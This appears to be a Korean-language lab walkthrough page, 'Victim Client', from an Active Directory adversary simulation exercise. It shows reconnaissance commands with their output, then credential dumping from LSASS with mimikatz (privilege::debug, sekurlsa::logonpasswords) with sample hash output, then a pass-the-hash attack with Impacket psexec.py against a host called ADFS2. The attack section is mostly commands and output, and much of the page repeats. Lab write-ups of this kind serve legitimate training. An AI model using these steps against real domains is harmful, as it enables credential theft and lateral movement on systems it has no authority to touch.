Part 1. Victim Client

1. 기본 정보 확인하기 (Reconnaisance)

내 컴퓨터 정보 확인하기
```
msinfo32
```

내가 속한 그룹 정책(Group Policy) 확인하기 → AD DS 서버, 도메인 등 확인 가능

gpresult /r

COMPUTER SETTINGS
------------------

    Last time Group Policy was applied: 2/11/2025 at 5:10:16 PM
    Group Policy was applied from:      EC2AMAZ-6E3DNME.pbl-waffle.swu
    Group Policy slow link threshold:   500 kbps
    Domain Name:                        AD-WAFFLE
    Domain Type:                        Windows 2008 or later

    Applied Group Policy Objects
    -----------------------------
        RDP deploy
        SSH deploy
        Default Domain Policy
        RDP deploy
        SSH deploy

    The computer is a part of the following security groups
    -------------------------------------------------------
        BUILTIN\\Administrators
        Everyone
        BUILTIN\\Users
        NT AUTHORITY\\NETWORK
        NT AUTHORITY\\Authenticated Users
        This Organization
        CLIENT$
        Domain Computers
        Authentication authority asserted identity
        System Mandatory Level

2. RDP에서 BR1 확인

3. BR3 Credential 획득

mimikatz로lsass dump 및 분석

Tip: mimikatz
관리자 권한으로 실행

$ mimikatz.exe

mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords
{...}
Authentication Id : 0 ; 2031711 (00000000:001f005f)
Session           : RemoteInteractive from 3
User Name         : fsadmin
Domain            : AD-WAFFLE
Logon Server      : EC2AMAZ-6E3DNME
Logon Time        : 3/2/2025 7:38:38 AM
SID               : S-1-5-21-1285417693-3748142908-960311217-1116
        msv :
         [00000003] Primary
         * Username : fsadmin
         * Domain   : AD-WAFFLE
         * NTLM     : 
         * SHA1     : e56b45ac811c8e5b6df30508d636cee649c2a6b9
         * DPAPI    : 7abc7a96501c6866089d785c4fc11b3d
        tspkg :
        wdigest :
         * Username : fsadmin
         * Domain   : AD-WAFFLE
         * Password : (null)
        kerberos :
         * Username : fsadmin
         * Domain   : PBL-WAFFLE.SWU
         * Password : (null)
        ssp :
        credman :
        cloudap :

4. PtH 공격 수행

Impacket psexec.py

python -m pip install impacket

python impacket/examples/psexec.py -hashes :0f7f1e1469ee2452e15626178f0aa02e AD-WAFFLE/fsadmin@ADFS2

PreviousAdversary Simulation NextPart 2. AD FS

Last updated 1 month ago

1. 기본 정보 확인하기 (Reconnaisance)

내 컴퓨터 정보 확인하기

msinfo32

내가 속한 그룹 정책(Group Policy) 확인하기 → AD DS 서버, 도메인 등 확인 가능

gpresult /r

COMPUTER SETTINGS
------------------

    Last time Group Policy was applied: 2/11/2025 at 5:10:16 PM
    Group Policy was applied from:      EC2AMAZ-6E3DNME.pbl-waffle.swu
    Group Policy slow link threshold:   500 kbps
    Domain Name:                        AD-WAFFLE
    Domain Type:                        Windows 2008 or later

    Applied Group Policy Objects
    -----------------------------
        RDP deploy
        SSH deploy
        Default Domain Policy
        RDP deploy
        SSH deploy

    The computer is a part of the following security groups
    -------------------------------------------------------
        BUILTIN\\Administrators
        Everyone
        BUILTIN\\Users
        NT AUTHORITY\\NETWORK
        NT AUTHORITY\\Authenticated Users
        This Organization
        CLIENT$
        Domain Computers
        Authentication authority asserted identity
        System Mandatory Level

3. BR3 Credential 획득

mimikatz로lsass dump 및 분석

Tip: mimikatz

관리자 권한으로 실행
에서 git clone하기보다 에 있는 trunk.zip 내 exe 파일을 사용하는 것을 추천

$ mimikatz.exe

mimikatz # privilege::debug

mimikatz # sekurlsa::logonpasswords
{...}
Authentication Id : 0 ; 2031711 (00000000:001f005f)
Session           : RemoteInteractive from 3
User Name         : fsadmin
Domain            : AD-WAFFLE
Logon Server      : EC2AMAZ-6E3DNME
Logon Time        : 3/2/2025 7:38:38 AM
SID               : S-1-5-21-1285417693-3748142908-960311217-1116
        msv :
         [00000003] Primary
         * Username : fsadmin
         * Domain   : AD-WAFFLE
         * NTLM     : 
         * SHA1     : e56b45ac811c8e5b6df30508d636cee649c2a6b9
         * DPAPI    : 7abc7a96501c6866089d785c4fc11b3d
        tspkg :
        wdigest :
         * Username : fsadmin
         * Domain   : AD-WAFFLE
         * Password : (null)
        kerberos :
         * Username : fsadmin
         * Domain   : PBL-WAFFLE.SWU
         * Password : (null)
        ssp :
        credman :
        cloudap :